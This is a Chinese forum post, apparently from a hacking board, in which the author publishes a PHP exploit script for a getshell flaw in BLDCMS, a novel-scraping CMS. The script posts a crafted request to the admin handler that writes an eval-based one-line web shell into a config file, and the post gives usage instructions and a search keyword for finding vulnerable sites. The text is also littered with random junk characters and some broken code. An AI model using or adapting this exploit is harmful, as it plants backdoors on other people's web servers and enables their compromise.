之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞5 S1 k* w: N/ i+ ~
# X- J6 j, g% @8 P
( P4 ?0 N" g' E9 Y$ s话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
6 @5 R# c! |8 _2 O( [% v
4 F, h# p, y+ U; y5 z g# j既然都有人发了 我就把我之前写好的EXP放出来吧1 \3 s% [4 w: W! \" {
2 T- ^/ I9 e) A
view source print?01.php;">' B( Q8 l' v: j" h) q7 T+ d
02.<!--?php2 R( x( [# s8 M; m" O" J
03.echo "-------------------------------------------------------------------9 G& C9 ~: s2 A$ } I! Q0 j
04.
2 `) n) z% y! J9 G% O8 h05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
1 R& S( ]7 o1 X. d( U* ^06. ; D$ U0 p$ a* o: \* A: K4 `. j
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
5 g' @5 M# {8 U08.
( Q# n3 G- j6 _* H5 U09.QQ:981009941\r\n 2013.3.21\r\n 1 S4 A. @- `2 ]5 L1 P, @+ H, C, l
10.
, A) o2 a* p# m. k0 S; r11. ! M$ X4 ~: v, K& |: N% U
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
1 \/ y4 }; }3 X% h8 `7 Y. C13.
# H4 k: v! G1 R! X: H' w4 m14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
+ Y$ H8 I! l" O# t15.
8 h# ^4 q/ i9 g3 X$ [6 J W16.--------------------------------------------------------------------\r\n";+ ] U% W6 Z! N5 X4 O
17.$url=$argv[1];
$ @. ^6 G$ [# A) p18.$dir=$argv[2];. r4 @6 w' O4 W5 `1 r# p1 ]
19.$pass=$argv[3];
7 G$ o1 Q8 n8 C% W+ I20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
% a8 s5 G$ G3 A. R( `. S# y- p21.if (emptyempty($pass)||emptyempty($url))
I. H6 p) ^, d; q7 ]: v22.{exit("请输入参数");}3 M: t. b" {0 a0 H3 k* E8 ^ F
23.else
: [( Q7 J9 V Y" W, x. }9 @24.{
W. u0 t$ q3 o; V; ?7 J I25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev6 F5 B. J' r, ?+ E7 p/ @
26. . A! C8 i) {) x6 ?
27.al;6 a# S! O- F& @, ] E- I; @
28.$length = strlen($fuckdata);" X- U; D) B; [4 U$ l
29.function getshell($url,$pass)% s$ l9 B% c7 ]( L
30.{
% w- H; o: n& B9 J6 f31.global $url,$dir,$pass,$eval,$length,$fuckdata;
4 M! F, L2 \2 n+ z32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
: ]9 \" }/ \- S4 c' Y0 S/ v. Q( R33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";8 N: I% y% M* ]0 F
34.$header .= "User-Agent: MSIE\r\n";
0 q( E6 {* y6 Z* p; ~' h$ S35.$header .= "Host:".$url."\r\n";
- D# t) S Z$ W2 f36.$header .= "Content-Length: ".$length."\r\n";% f/ K( ]4 Y/ h/ B0 t
37.$header .= "Connection: Close\r\n";' i3 O; X; p9 G5 B7 B. c8 ~8 f; X
38.$header .="\r\n";6 A' M l. k% `0 i' A0 f; p: \! f
39.$header .= $fuckdata."\r\n\r\n";- G( v. Z8 }5 D* c( P
40.$fp = fsockopen($url, 80,$errno,$errstr,15);7 @, b; r c; [4 J6 P7 U. y8 C
41.if (!$fp)/ ]- R3 w# ?7 W' e5 N4 f( h
42.{
; y% V/ R4 P% j4 R; C43.exit ("利用失败:请检查指定目标是否能正常打开");
- U. |2 |/ s. H! y& W& i% h D! d44.}
' K0 L: H$ I3 i1 `# j+ ^45.else{ if (!fputs($fp,$header))
* ?% o0 b7 C' u# w, o. [46.{exit ("利用失败");}
) D6 L% z5 ^- H6 x' n' F47.else1 P, @2 c: Y' H- X! K1 b
48.{
- f# N5 Z( p2 J1 e& m49.$receive = '';( m1 `0 z- m \' _3 J
50.while (!feof($fp)) {
- D% \% ? e# D& A9 d51.$receive .= @fgets($fp, 1000);
9 Q; P5 e. q0 A5 n& l52.}; s! A E1 s8 G: t( [4 k; ?
53.@fclose($fp);
" R, n+ y% x0 Z( I' ^54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标
+ H" f0 } ]$ k+ e" Z" f55.
+ N! `* E, N0 C: T" X56.GPC是否=off)";
; h' O, j+ J" w; p1 d3 `57.}}) m- W' b! n& U- z# d
58.}
' Y7 U$ p% |: K1 Z+ B8 W59.}
Z1 C6 w5 \, o% s60.getshell($url,$pass);
* z" \( J7 u, c& i1 g& {61.?-->5 S& I$ \" U# x+ D: D
1 v1 Y0 T1 F$ }; u) _
4 \' s' w K* Z : d* @3 [- O; s( Q3 K( H* o# e
by 数据流9 C& \- S; J) w8 t
|